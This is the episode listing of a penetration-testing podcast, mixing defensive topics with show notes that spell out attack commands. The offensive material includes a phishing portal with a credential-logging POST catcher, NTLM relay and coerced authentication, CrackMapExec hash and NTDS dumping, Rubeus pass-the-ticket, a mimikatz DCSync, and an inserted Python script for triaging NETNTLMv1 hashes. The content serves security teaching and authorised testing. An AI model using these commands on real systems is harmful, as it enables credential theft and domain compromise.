    7 Minute Security

    7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.


    Copyright: © Brian Johnson


    Latest Episodes:
    7MS #600: First Impressions of Using AI on Penetration Tests Dec 01, 2023

    Hey friends, today I share my experience working with ChatGPT, Ollama.ai, PentestGPT and privateGPT to help me pentest Active Directory, as well as a machine called Pilgrimage from HackTheBox.

    Will AI replace pentesters as we know them today? In my humble opinion: not quite yet. Check out today's episode to hear more, and please join me on Wednesday, December 6 for my Webinar on this topic with Netwrix called Hack the Hackers: Exploring ChatGPT and PentestGPT in Penetration Testing!


    7MS #599: Baby's First Responsible Disclosure Nov 25, 2023

    Today we talk about our first experience working through the responsible disclosure process after finding vulnerabilities in a security product. We cannot share a whole lot of details as of right now, but wanted to give you some insight into the testing/reporting process thus far, which includes the use of:

    • BulletsPassView
    • MITMsmtp
    • mitmproxy

    7MS #598: Hacking Billy Madison - Part 4 Nov 17, 2023

    Today our good buddy Paul and I keep trying to hack the VulnHub machine based on the movie Billy Madison (see part 1 and 2 and 3). In today's final chapter, Paul and I:

    • Find Eric's secret SSH back door

    • Locate and decrypt a hidden file with Billy's homework

    • Build wordlists with cewl

    • Save Billy from the evil clutches of Eric Gordon!!!


    7MS #597: Let's JAMBOREE (Java-Android-Magisk-Burp-Objection-Root-Emulator-Easy) with Robert McCurdy Nov 11, 2023

    Today we had a blast talking with Robert McCurdy about JAMBOREE (Java-Android-Magisk-Burp-Objection-Root-Emulator-Easy)! JAMBOREE allows you to quickly spin up a portable Git/Python/Java environment and much more! From a pentesting POV, you can whip up an Android pentesting environment, BloodHound/SharpHound combo, Burp Suite...the list goes on!


    7MS #596: How to Succeed in Business Without Really Crying - Part 13 Nov 04, 2023

    After about a year break (the last edition of this series was in October 2022), we're back with an updated episode of How to Succeed in Business Without Really Crying. We cover:

    • Why we're not planning on selling the business any time soon
    • Fast Google Dorks Scan
    • Using ProtonVPN via command line
    • Our pre first impressions of a pentesting SaaS tool you've almost definitely heard of

    7MS #595: Choosing the Right XDR Strategy with Matt Warner of Blumira Oct 31, 2023

    Today we're joined by Matt Warner of Blumira (remember him from episodes #551 and #529 and #507?) to talk about choosing the right XDR strategy! There's a lot to unpack here. Are EDR, MDR and XDR related? Can you get them all from one vendor - and should you? Do you run them on-prem, in the cloud, or both? Join us as Matt answers these questions and more!


    7MS #594: Using PatchMyPC to Auto-Update Pentest Dropboxes Oct 23, 2023

    Today we're talking about how you can use PatchMyPC to keep your home PC and/or pentest dropbox automatically updated with the latest/greatest patches!


    7MS #593: Hacking Billy Madison - Part 3 Oct 15, 2023

    Hey friends, today my pal Paul and I kept trying to hack the VulnHub machine based on the movie Billy Madison (see part 1 and 2). In our journey we learned some good stuff:

    • Port knocking is awesome using utilities like knock:

    /opt/knock/knock 10.0.7.124 1466 67 1469 1514 1981 1986

    • Sending emails via the command line is made (fairly) easy with swaks:

    swaks --to eric@madisonhotels.com --from vvaughn@polyfector.edu --server 192.168.110.105:2525 --body "My kid will be a soccer player" --header "Subject: My kid will be a soccer player"

    You could also use telnet and do this command by command - see this article from Black Hills Information Security for more info.

    • Hydra works well for spraying FTP creds:

    hydra -l user -P passlist.txt ftp://192.168.0.1

    • Check out my quick cheat sheet about bettercap (see episode #522) for some syntax on extracting WPA handshake data from cap files:

    # ...it looks like the new standard hash type might be m22000 per this article (https://hashcat.net/forum/thread-10253.html).
    # In that case, here's what I did on the pcap itself to get it ready for hashcat:
    sudo /usr/bin/hcxpcapngtool -o readytocrack.hc22000 wifi-handshakes.pcap
    # Then crack with hashcat!
    sudo /path/to/hashcat -m22000 readytocrack.hc22000 wordlist.txt

    7MS #592: 7 Steps to Recover Your Hacked Facebook Account Oct 06, 2023

    Today we're talking about 7 steps you can take to (hopefully) reclaim a hacked Facebook account. The key steps are:

    1. Ask Facebook for help (good luck with that)
    2. Put out an SOS on your socials
    3. Flag down the FBI
    4. Call the cops!
    5. Grumble to your attorney general
    6. Have patience
    7. Lock it down (once you get the account back)!

    Also, I have to say that this article was a fantastic resource in helping me create the outline above.


    7MS #591: Tales of Pentest Pwnage - Part 52 Sep 29, 2023

    Today we talk about an awesome path to internal network pentest pwnage using downgraded authentication from a domain controller, a tool called ntlmv1-multi, and a boatload of cloud-cracking power on the cheap from vast.ai. Here are my chicken scratch notes for how to take the downgraded authentication hash capture (using Responder.py -I eth0 --lm) and eventually tweeze out the NTLM hash of the domain controller (see https://7ms.us for full show notes).


    7MS #590: Hacking Billy Madison - Part 2 Sep 22, 2023

    Today my pal Paul and I continued hacking Billy Madison (see part one here) and learned some interesting things:

    • You can fuzz a URL with a specific file type using a format like this:

    wfuzz -c -z file,/root/Desktop/wordlist.txt --hc 404 http://x.x.x.x/FUZZ.cap

    • To rip .cap files apart and make them "pretty" you can use tcpick:

    tcpick -C -yP -r tcp_dump.pcap

    Or tcpflow:

    apt install tcpflow
    tcpflow -r tcp_dump.pcap

    • To do port knocking, you can use the knock utility:

    sudo git clone https://github.com/grongor/knock /opt/knock
    knock 1.2.3.4 21 23 25 69 444 7777777

    7MS #589: Tales of Pentest Pwnage - Part 51 Sep 15, 2023

    In today's tale of pentest pwnage we talk about:

    • The importance of local admin and how access to even one server might mean instant, full control over their backup or virtualization infrastructure

    • Copying files via WinRM when copying over SMB is blocked:

    $sess = New-PSSession -ComputerName SERVER-I-HAVE-LOCAL-ADMIN-ACCESS-ON -Credential *

    ...then provide your creds...and then:

    Copy-Item c:\superimportantfile.doc -Destination c:\my-local-hard-drive\superimportantfile.doc -FromSession $sess

    • If you come across PowerShell code that crafts a secure string credential, you may be able to decrypt the password variable with:

    [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MyVarIWantToDecryptGoesHere))

    7MS #588: Becoming a Sysmon Sensei with Amanda Berlin Sep 08, 2023

    Today Amanda Berlin from Blumira teaches us how to unlock the power of Sysmon so we can gain insight into the good, bad and ugly things happening on our corporate endpoints! Key takeaways:

    • Sysmon turns your Windows logging up to 11, and pairs well with a config file like this one or this one.
    • Careful if you are running Sysmon on non-SSD drives - the intense number of writes might bring that disk to its knees.
    • Just getting started logging all the things with Sysmon? Why not pump those logs into a free logging/alerting system like Wazuh?
    • I think it was SolarWinds log collector I was trying to think of while recording the show, not CloudTrail.

    7MS #587: Hacking Billy Madison Sep 01, 2023

    Today my pal Paul from Project7 and I hack the heck out of Billy Madison, a vulnerable virtual machine that is celebrating its 7th anniversary this month!


    7MS #586: DIY Pentest Dropbox Tips – Part 8 Aug 25, 2023

    Today, sadly, might be the last episode of DIY pentest dropbox tips for a while because I found (well, ChatGPT did actually) the missing link to 100% automate a Kali Linux install! Check episode #449 for more info on building your Kali preseed file, but essentially the last line in my file runs a kali.sh script to download/install all the pentest tools I want. The "missing link" part is I figured out how to get Kali to reboot and then run a script one time to complete all the post-install stuff. So at the bottom of my kali.sh is this:

    sudo wget https://somesite/kali-docker.sh -O /opt/kali-docker.sh
    sudo chmod +x /opt/kali-docker.sh
    sudo touch /flag
    sudo wget https://somesite/docker.service -O /etc/systemd/system/mydocker.service
    sudo systemctl daemon-reload
    sudo systemctl enable mydocker.service

    The contents of docker.service are:

    [Unit]
    Description=Docker install

    [Service]
    Type=simple
    ExecStart=/opt/kali-docker.sh

    [Install]
    WantedBy=multi-user.target

    The beginning and end snippets of kali-docker.sh are:

    #!/bin/bash
    flag_file="/flag"
    if [ -e "$flag_file" ]; then
        # get bbot
        sudo docker run -it blacklanternsecurity/bbot:stable --help
        # Do a bunch of other install things...
        rm "$flag_file"
    else
        echo "Script already ran before. Exiting"
    fi

    So essentially the workflow is: kali.sh runs, downloads and installs kali-docker.sh, and also installs a service that runs kali-docker.sh on each reboot. But when kali-docker.sh runs, it checks for the presence of a file called /flag. If /flag exists, all the post-install commands will run, and the flag is deleted at the end so they only ever run once. If it does not exist, those commands won't run. Simple, yet genius I think!


    7MS #585: DIY Pentest Dropbox Tips – Part 7 Aug 18, 2023

    Hey friends, today I'm super excited to share I found the missing link! Specifically, the missing piece that now allows me to create fully automated Windows 10 installs that serve as virtual pentest jumpboxes. Here are the high points:

    • When your deployment script is finishing and you need the system to reboot and run some final commands, temporarily add your account as an auto-login account like so:

    New-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name AutoAdminLogon -Value 1 -Force
    New-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name DefaultUserName -Value "your-local-user" -Force
    New-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name DefaultPassword -Value "your-password" -Force

    Then tell Windows to run your final script one time after automatically logging in as your-local-user:

    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v MyRunOnceKey /t REG_SZ /d "c:\your-final-script.bat"

    Finally, make sure your-final-script.bat deletes the auto-login creds (DefaultPassword sits in that key in plaintext, readable by anyone who can read the registry):

    reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /f
    reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /f
    reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /f

    7MS #584: Tales of Pentest Pwnage - Part 50 Aug 11, 2023

    In today's tale of pwnage, we'll talk about how domain trusts can be dangerous because they have...well...trust issues.


    7MS #583: Cred-Capturing Phishing with Caddy Server Aug 04, 2023

    Today we talk about crafting cool cred-capturing phishing campaigns with Caddy server! Here's a quick set of install commands for Ubuntu:

    sudo apt install -y debian-keyring debian-archive-keyring apt-transport-https
    curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/gpg.key' | sudo gpg --dearmor -o /usr/share/keyrings/caddy-stable-archive-keyring.gpg
    curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt' | sudo tee /etc/apt/sources.list.d/caddy-stable.list
    sudo apt update
    sudo apt install caddy -y

    Create an empty directory for your new site, and then create a file called Caddyfile. If all you want is a simple static site (and you've already pointed DNS for yourdomain.com to your Ubuntu droplet), just put the domain name in the Caddyfile:

    domain.com

    Then type sudo caddy run - and that's it! You'll serve up a blank site with lovely HTTPS goodness! If you want to get more fancy, make an index.html with a basic phishing portal:

    Your rad awesome eyeball cool phishing portal!

    body {
      background-image: url("https://tangent.town/static/background.jpg");
      background-repeat: no-repeat;
      background-size: cover;
    }

    User Name:

    Password:

    Unauthorized use is prohibited!

    This will now be served when you visit domain.com. However, Caddy doesn't (to my knowledge) have a way to handle POST requests. In other words, it doesn't have the ability to log usernames and passwords people put in your phishing portal. One of our pals from Slack asked ChatGPT about it and was offered this separate Python code to run as a POST catcher:

    from flask import Flask, request

    app = Flask(__name__)

    @app.route('/capture', methods=['POST'])
    def capture():
        print(request.form)
        return 'OK', 200

    if __name__ == '__main__':
        app.run(host='0.0.0.0', port=5000)

    If you don't have Flask installed, do this:

    sudo apt install python3-pip -y
    sudo pip install Flask

    Run this file in one session, then in your index.html file make a small tweak in the form action directive:

    Try sending creds through your phishing portal again, and you will see they are now logged in your Python POST catcher!


    7MS #582: Using Wazuh as a SIEM for Work and Home Jul 31, 2023

    Today we had a blast playing with Wazuh as a SIEM you can use for work and/or home. Inspiration for this episode came from Network Chuck.

    This one-liner will literally get Wazuh installed in about 5 minutes:

    curl -sO https://packages.wazuh.com/4.4/wazuh-install.sh && sudo bash ./wazuh-install.sh -a

    P.S. if you accidentally close your command window before writing down the admin password (like I did), you can use this command to retrieve it:

    sudo tar -O -xvf wazuh-install-files.tar wazuh-install-files/wazuh-passwords.txt

    Once Wazuh is installed, I recommend going to Management > Configuration > Edit Configuration, look for a section that starts with and change no to yes.

    Also, before you start deploying agents, I recommend making some groups for them, which I believe has to be done at the command line:

    /var/ossec/bin/agent_groups -a -g windows-boxes -q
    /var/ossec/bin/agent_groups -a -g linux -q

    From there you should be ready to start rockin' some agent installs. Have fun!


    7MS #581: Tales of Pentest Pwnage - Part 49 Jul 21, 2023

    Oooo, giggidy! Today's tale of pentest pwnage is about pwning vCenter with CVE-2021-44228 - a vulnerability that lets us bypass authentication entirely and do/take what we want from vCenter! Key links to make the magic happen:

    • How to exploit log4j manually in vCenter
    • How to automate the attack!
    • Tool to steal the SAML database you extract from vCenter

    7MS #580: Hacking Tommy Callahan - Part 3 Jul 17, 2023

    Today my pal Paul from Project7 and I did a live hacking session and finally got the Callahan Auto brake pad Web app back online! Hopefully you enjoyed this hacking series. The feedback has been great, so we may have to take a crack at Billy in the near future as well.


    7MS #579: Hacking Tommy Callahan - Part 2 Jul 07, 2023

    Hey friends, today we're continuing our series on pwning the Tommy Boy VM on VulnHub! P.S. did you miss part one? Check it out on YouTube. Joe "The Machine" Skeen and I had a blast poking and prodding at the VM in hopes of fixing the broken Callahan Auto brake-ordering Web app. Some tips/tricks we cover:

    • It's always a good idea to look at a site's robots.txt file
    • crunch is awesome for making wordlists
    • fcrackzip is rad for cracking encrypted zip files
    • dirbuster works well for busting into hidden files and subfolders
    • exiftool works well to pull metadata out of images

    7MS #578: Interview with Mike Toole of Blumira Jun 30, 2023

    Today I'm excited to share a featured interview with our new friend Mike Toole of Blumira. We talk about all things EDR, including:

    • How does it differ from something like Windows Defender?

    • What things do I need to keep in mind if I'm in the market for an EDR purchase?

    • Is Mac EDR any good?

    • How do attackers bypass EDR?

    • Will AI create indestructible malware, take over the human race and then use our bodies for batteries?


    7MS #577: Tales of Pentest Pwnage - Part 48 Jun 16, 2023

    Holy schnikes - this episode is actually 7 minutes long! What a concept!

    Anyway, today I give you a couple tips that have helped me pwn some internal networks the last few weeks, including:

    • Getting a second (and third?) opinion on Active Directory Certificate Services vulnerabilities!

    • Analyzing the root domain object in BloodHound to find some misconfigs that might equal instant domain admin access!


    7MS #575: Annoying Attackers with ADHD - Part 2 Jun 09, 2023

    Hey friends! Today we're taking a second look at ADHD - Active Defense Harbinger Distribution - a cool VM full of tools designed to annoy/attribute/attack pesky attackers! The tools covered today include:

    PHP-HTTP-TARPIT

    A tool to confuse and waste bot/scanner/hacker time. Grab it here and check out our setup instructions:

    sudo git clone https://github.com/msigley/PHP-HTTP-Tarpit.git /opt/tarpit
    cd /opt/tarpit
    sudo mv la_brea.php /var/www/html/index.php
    cd /var/www/html/
    # Delete the default HTML files that are there
    sudo rm DEFAULT .HTML FILES
    # Start/restart apache2
    sudo service apache2 stop
    sudo service apache2 start
    # It's easier to see PHP-HTTP-TARPIT in action from the command line:
    curl -i http://IP.RUNNING.THE.TARPIT

    Spidertrap

    This tool tangles Web visitors in a never-ending maze of pages with links!

    sudo git clone https://github.com/adhdproject/spidertrap.git /opt/spidertrap
    cd /opt/spidertrap
    # Open spidertrap.py and change the listening port from 8080 to 80
    sudo nano spidertrap.py
    # Run the trap
    sudo python3 spidertrap.py

    Weblabyrinth

    This tool presents visitors with a blurb of text from Alice in Wonderland. That text has links that take them to...you guessed it...more Alice in Wonderland excerpts! I especially like that if you visit ANY folder or link inside Weblabyrinth, content is served (return code 200 for anything and everything).

    I had problems getting this running on a fresh Kali box so it's probably better to run right off the ADHD distro using their instructions.


    7MS #574: Annoying Attackers with ADHD Jun 02, 2023

    Hey friends! Today we're looking at ADHD - Active Defense Harbinger Distribution - a cool VM full of tools designed to annoy/attribute/attack pesky attackers! ADHD gets you up and running with these tools quickly, but the distro hasn't been updated in a while, so I switched to a vanilla Kali system and set up a Cowrie SSH honeypot as follows (see 7ms.us for the full list of commands).


    7MS #573: Securing Your Mental Health - Part 4 May 26, 2023

    Today we're talking about reducing anxiety by hacking your mental health with these tips:

    • Using personal automation to text people important reminders
    • Using Remind to create a personal communication "class" with your family members
    • Using Smartsheet (not a sponsor) to create daily email "blasts" to yourself about all the various project todos you need to tackle

    7MS #572: Protecting Your Domain Controllers with LDAP Firewall May 19, 2023

    Today we look at LDAP Firewall - a cool (and free!) way to defend your domain controllers against SharpHound enumeration, LAPS password enumeration, and the noPac attack.


    7MS #571: Simple Ways to Test Your SIEM - Part 2 May 12, 2023

    Hey friends! This week I spoke at the Secure360 conference in Minnesota on Simple Ways to Test Your SIEM. This is something I covered a while back on the podcast, but punched up the content a bit and built a refreshed two-part GitHub gist that covers:

    • Questions you can ask a prospective SIEM/SOC solution to figure out which one is the right fit for you
    • All the tools/tips/scripts/etc. you need to run through 7 (and more!) simple ways to test your SIEM!

    7MS #570: How to Build a Vulnerable Pentest Lab - Part 4 May 05, 2023

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    In today's episode we staged an NTLM relay attack using a vulnerable SQL server.

    First we used CrackMapExec (see our two part series on Cracking and Mapping and Execing with CrackMapExec - part 1 / part 2) to find hosts with SMB signing disabled:

    cme smb x.x.x.x/24 -u USER -p PASS --gen-relay-list smbsigning.txt

    Then we setup lsarelayx in one window:

    lsarelayx --host=localhost

    And in a second window we ran ntlmrelayx.py:

    python ntlmrelayx.py -smb2support --no-smb-server -t smb://VICTIM

    Finally, in a third window we triggered authentication from the vulnerable SQL server:

    Invoke-SQLUncPathInjection -verbose -captureip OUR.ATTACKING.IP.ADDRESS

    Boom! Watch the local usernames and hashes fall out of the victim system.

    We also tried doing a multirelay scenario where we had a list of victim hosts in a targets.txt file like this:

    victim1
    victim2
    victim3

    Then we tweaked the ntlmrelayx command slightly:

    python ntlmrelayx.py -smb2support --no-smb-server -tf targets.txt

    Interestingly(?) only victim2 was attacked.

    Lastly, we ran the same attack but added the -socks option to establish SOCKS connections upon successful relay:

    python ntlmrelayx.py -smb2support --no-smb-server -tf targets.txt -socks

    Interestingly(?) we got a low-priv user to relay and setup a SOCKS connection, but not the domain admin configured on the SQL server.

    TLDR/TLDL: relaying credentials to a single victim with ntlmrelayx on a Windows host seems to work great! Your mileage may vary if you try to pull off more advanced tricks with ntlmrelayx.


    7MS #569: Interview with Jim Simpson of Blumira Apr 28, 2023

    Today we're excited to share a featured interview with our new friend Jim Simpson, CEO of Blumira. Jim was in security before it was hip/cool/lucrative, working with a number of startups as well as some big names like Duo. Blumira and 7 Minute Security have a shared love for helping SMBs be more secure, so it was great to chat with Jim about the IT/security challenges faced by SMBs, and what we can do make security more simple and accessible for them.


    7MS #568: Let's Play With the 2023 Local Administrator Password Solution! Apr 21, 2023

    Hey friends, today we're playing with the new (April 2023) version of Local Administrator Password Solution (LAPS). Now it's baked right into PowerShell and the AD Users and Tools console. It's awesome, it's a necessary blue team control for any size company, and you should basically stop reading this and install LAPS now.


    7MS #567: How to Build an Intentionally Vulnerable SQL Server Apr 14, 2023

    Hey friends, today we're talking about building an intentionally vulnerable SQL server, and here are the key URLs/commands talked about in the episode:

    • Download SQL Server here

    • Install SQL via config .ini file

    • Or, install SQL via pure command line

    • Deploy SQL with a service account while also starting TCP/IP and named pipes automagically:

    setup.exe /Q /IACCEPTSQLSERVERLICENSETERMS /ACTION="install" /FEATURES=SQL /INSTANCENAME=MSSQLSERVER /TCPENABLED=1 /NPENABLED=1 /SQLSVCACCOUNT="YOURDOMAIN\YOUR-SERVICE-ACCOUNT" /SQLSVCPASSWORD="YOUR PASSWORD" /SQLSYSADMINACCOUNTS="YOURDOMAIN\administrator" "YOURDOMAIN\domain users"

    • Run PowerUpSQL to find vulnerable SQL servers:

    $Targets = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 | Where-Object {$_.Status -like "Accessible"}

    • Audit the discovered SQL servers:

    Get-SQLInstanceDomain -Verbose | Invoke-SQLAudit -Verbose

    • Fire off stored procedures to catch hashes!

    Invoke-SQLUncPathInjection -Verbose -CaptureIP IP.OF-YOUR.KALI.BOX

    7MS #566: Tales of Pentest Pwnage - Part 47 Mar 31, 2023

    Ok, I know we say this every time, but it is true this time yet again: this is our favorite tale of pentest pwnage. It involves a path to DA we've never tried before, and introduced us to a new trick that one of our favorite old tools can do!


    7MS #565: How to Simulate Ransomware with a Monkey Mar 24, 2023

    Hey friends, today we talk through how to simulate ransomware (in a test environment!) using Infection Monkey. It's a cool way to show your team and execs just how quick and deadly an infection can be to your business. You can feed the monkey a list of usernames and passwords/hashes to use for lateral movement, test network segmentation, set a UNC path of files to actually encrypt (careful - run in a test lab - NOT in prod!) and more!


    7MS #564: First Impressions of OVHcloud Hosted vCenter Mar 17, 2023

    Today we offer you some first impressions of OVHcloud and how we're seriously considering moving our Light Pentest LITE training class to it! TLDR:

    • It runs on vCenter, my first and only virtualization love!

    • Unlimited VM "powered on" time and unlimited bandwidth

    • Integration with PowerShell so you can run a single script to "heal" your environment to a gold image

    • Easy integration with pfSense to be able to manage the firewall and internal/external IPs

    • Price comparable to what we're paying now in Azure land


    7MS #563: Cracking and Mapping and Execing with CrackMapExec - Part 2 Mar 10, 2023

    Hey friends, today we're covering part 2 of our series all about cracking and mapping and execing with CrackMapExec. Specifically we cover:

    # Enumerate where your user has local admin rights:
    cme smb x.x.x.x/24 -u user -p password
    # Set wdigest flag:
    cme smb x.x.x.x -u user -p password -M wdigest -o ACTION=enable
    # Dump AD creds:
    cme smb IP.OF.DOMAIN.CONTROLLER -u user -p password --ntds --enabled
    # Clean up AD dump output:
    cat /path/to/file.ntds | grep -iv disabled | cut -d ':' -f1,4 | grep -v '\$' | sort
    # Check ms-ds-machineaccountquota:
    cme ldap x.x.x.x -u user -p password -M maq
    # Check for Active Directory Certificate Services:
    cme ldap x.x.x.x -u user -p password -M adcs
    # Pull all AD user descriptions:
    cme ldap x.x.x.x -u user -p password -M get-desc-users
    # Pull all AD user descriptions down to a file and search for users with "pass" in description:
    cme ldap x.x.x.x -u user -p password -M user-desc

    # CrackMapExec database (cmedb)
    ## Clear database
    sudo rm -r ~/.cme
    ## Handy commands inside the cmedb prompt:
    hosts
    shares
    creds
    export shares detailed shares.csv
    export creds detailed creds.txt

    7MS #562: Cracking and Mapping and Execing with CrackMapExec Mar 03, 2023

    Hey friends, today we covered many things cracking and mapping and execing with CrackMapExec. Specifically:

    # General enumeration to see if your account works, and where:
    cme smb x.x.x.x -u username -p pass
    # Check if print services are enabled:
    cme smb x.x.x.x -u username -p pass -M spooler
    # Check for the nopac vuln:
    cme smb x.x.x.x -u username -p pass -M nopac
    # Find GP passwords:
    cme smb DOMAIN.CONTROLLER.IP.ADDRESS -u username -p pass -M gpp_password
    # Get list of targets without SMB signing (relay candidates):
    cme smb x.x.x.x -u username -p pass --gen-relay-list smbsigning.txt
    # Set wdigest flag:
    cme smb x.x.x.x -u username -p pass -M wdigest -o ACTION=enable
    # Dump creds/hashes:
    cme smb x.x.x.x -u username -p pass -M lsassy
    # Do pass the hash attacks:
    cme smb x.x.x.x -u username -H HASH
    # Dump SAM database:
    cme smb x.x.x.x -u username -p pass --sam
    # Enumerate SMB shares:
    cme smb x.x.x.x -u username -p pass --shares
    # Conduct slinky attack:
    cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7
    # Cleanup from slinky attack (the module's CLEANUP option removes the planted .lnk files):
    cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7 CLEANUP=True

    7MS #561: Interview with Chris Furner of Blumira Feb 24, 2023

    Today I sat down with Chris Furner of Blumira to talk about all things cyber insurance. Many of 7MinSec's clients are renewing their policies this time of year, and many are looking into policies for the first time. Naturally, there are a ton of questions to ask and things to think about to make good coverage decisions for your business:

    • How do I get started in looking for a cyber policy - with my general liability insurer? Or are there companies that specialize just in cyber insurance?

    • How do I make sure I have the appropriate levels of coverage?

    • What are basic things I can do from a security standpoint that pretty much any insurer is going to expect me to do?

    Enjoy the interview, where we cover these questions - and more! And be sure to also check out Blumira's whitepaper on this topic called The State of Cyber Insurance.


    7MS #560: 7MOOCH - Dolphin Rides Are Done Dude Feb 17, 2023

    Hey friends, I took a mental health break this week and pre-podcasted this episode of a new series called 7MOOCH: 7 Minutes of Only Chuckles. In today's story, we unpack a situation in Hawaii that made me exclaim the following quite loudly: "Dolphin rides are done, dude!"


    7MS: #559: Tales of Pentest Pwnage - Part 46 Feb 10, 2023

    Ooooo giggidy! Today's episode is about a pentest pwnage path that is super fun and interesting, and I've now seen 3-4 times in the wild. Here are some notes from the audio/video that will help bring this to life for you (oh and read this article for a great tech explanation of what's happening under the hood):

    Change the Responder.conf file like so:

    ; Custom challenge.
    ; Use "Random" for generating a random challenge for each requests (Default)
    Challenge = 1122334455667788

    Run Responder with the --disable-ess flag:

    sudo python3 /opt/responder/Responder.py -I eth0 --disable-ess

    Use printerbug to coax authentication from a domain controller:

    sudo python3 /opt/krbrelay-dirkjanm/printerbug.py yourdomain.com/someuser@IP.OF.DOMAIN.CONTROLLER IP.OF.ATTACKING.BOX

    Convert hash to make it easier to crack!

    sudo python3 /opt/ntlmv1-multi/ntlmv1.py --ntlmv1 THE-HASH-YOU-GOT-FROM-RESPONDER

    Take the NTHASH:XXX token and go to crack.sh to have it cracked in about 30 seconds! What comes back is the NT hash of the domain controller's machine account (not a password), which is exactly what the next step needs.

    Now you can do a Rubeus asktgt with the DC machine account's NT hash:

    rubeus.exe asktgt /domain:yourdomain.com /user:DOMAIN-CONTROLLER-NAME$ /rc4:HASH-GOES-HERE /nowrap

    Now pass the ticket and impersonate the DC LOL MUAHAHAHAHAHAHAAH!!

    rubeus.exe ptt /ticket:TICKET GOES HERE

    Use mimikatz to dump all hashes (each command is quoted so mimikatz receives it as one argument):

    mimikatz.exe "privilege::debug" "log hashes.txt" "lsadump::dcsync /domain:yourdomain.com /all /csv"
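    Here is an added example (not from the podcast, and not ntlmv1-multi's code) that does the triage ntlmv1.py does before you hand a hash to crack.sh: it parses the NETNTLMv1 line Responder prints, works out whether the client used Extended Session Security, derives the effective challenge, and emits the cracker inputs. The sample hashes are constructed placeholders, not real captures; the field layout assumed is Responder's user::DOMAIN:lm_response:nt_response:server_challenge.

```python
"""Triage a NETNTLMv1 line from Responder before sending it to a DES cracker."""
import hashlib

FIXED_CHALLENGE = bytes.fromhex("1122334455667788")


def parse_netntlmv1(line: str) -> dict:
    """Parse Responder's 'user::DOMAIN:lm_response:nt_response:server_challenge'."""
    parts = line.strip().split(":")
    if len(parts) != 6:
        raise ValueError("expected user::DOMAIN:lmresp:ntresp:challenge")
    user, _, domain, lm_hex, nt_hex, chal_hex = parts
    lm, nt, chal = (bytes.fromhex(h) for h in (lm_hex, nt_hex, chal_hex))
    if len(lm) != 24 or len(nt) != 24 or len(chal) != 8:
        raise ValueError("NTLMv1 responses are 24 bytes, the server challenge 8 bytes")
    # With Extended Session Security (NTLM2 session response) the LM field is an
    # 8-byte client nonce followed by 16 zero bytes, and the NT response was
    # computed over MD5(server_challenge || client_nonce)[:8], not the raw challenge.
    ess = lm[8:] == b"\x00" * 16
    effective = hashlib.md5(chal + lm[:8]).digest()[:8] if ess else chal
    return {
        "user": user, "domain": domain, "ess": ess,
        "server_challenge": chal.hex(), "effective_challenge": effective.hex(),
        "nt_response": nt.hex(),
    }


def crack_formats(parsed: dict) -> dict:
    """Cracker inputs for one parsed line.

    The NT response is DES(k1, chal) || DES(k2, chal) || DES(k3, chal) with k1..k3
    cut from the 16-byte NT hash (padded to 21 bytes), so recovering the DES keys
    gives back the NT hash itself, which is all Rubeus /rc4: needs. The crack.sh
    NTHASH: token is only meaningful when the effective challenge is the fixed
    1122334455667788 its tables were built for; with ESS it never is.
    """
    eff = parsed["effective_challenge"]
    nt_resp = parsed["nt_response"]
    token = f"NTHASH:{nt_resp}" if bytes.fromhex(eff) == FIXED_CHALLENGE else None
    return {"john_netntlm": f"$NETNTLM${eff}${nt_resp}", "cracksh_token": token}


# Constructed samples: the hex bodies are placeholders, not real responses.
SAMPLE_NO_ESS = ("DC01$::CORP:" + "0123456789abcdef" * 3 + ":" + "fedcba9876543210" * 3
                 + ":1122334455667788")
SAMPLE_ESS = ("DC01$::CORP:" + "0011223344556677" + "0" * 32 + ":" + "89abcdef01234567" * 3
              + ":1122334455667788")

if __name__ == "__main__":
    for sample in (SAMPLE_NO_ESS, SAMPLE_ESS):
        p = parse_netntlmv1(sample)
        print(p["user"], "ESS" if p["ess"] else "no ESS", crack_formats(p))
```

    The second sample shows why --disable-ess matters: the LM field is a client nonce plus zeros, the effective challenge becomes an MD5-derived value, and no crack.sh token can be produced for it even though Responder still sent 1122334455667788.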

    7MS #558: How to Build a Vulnerable Pentest Lab - Part 2 Feb 07, 2023

    Today we continue part 2 of a series we started a few weeks ago all about building a vulnerable pentesting lab. Check out the video above, and here are the main snippets of code and tips to get you going:

    • Use Youzer to import a bunch of bogus users into your Active Directory:
    sudo python ./youzer.py --generate --generate_length 20 --ou "ou=Contractors,dc=brifly,dc=us" --domain brifly.us --users 1000 --output lusers.csv
    • Make a Kerberoastable user:
    New-ADUser -Name "Kerba Roastable" -GivenName "Kerba" -Surname "Roastable" -SamAccountName Kerba -Description "ROASTED!" -Path "OU=Contractors,DC=brifly,DC=us" -AccountPassword (ConvertTo-SecureString "Password1" -AsPlainText -Force) -PassThru -PasswordNeverExpires $true
    Enable-ADAccount Kerba
    setspn -a IIS_SITE/brifly-dc01.brifly.us:77777 briflyus\kerba

    7MS #557: Better Passive Network Visibility Using Teleseer Jan 27, 2023

    Today we're talking about Teleseer, which is an awesome service to give you better network visibility - whether you're on the blue, red or purple team! It all starts with a simple packet capture, and ends with gorgeous visuals and insight into what the heck is on your network and - from a pentester's perspective - delicious vulnerabilities that may lie within!


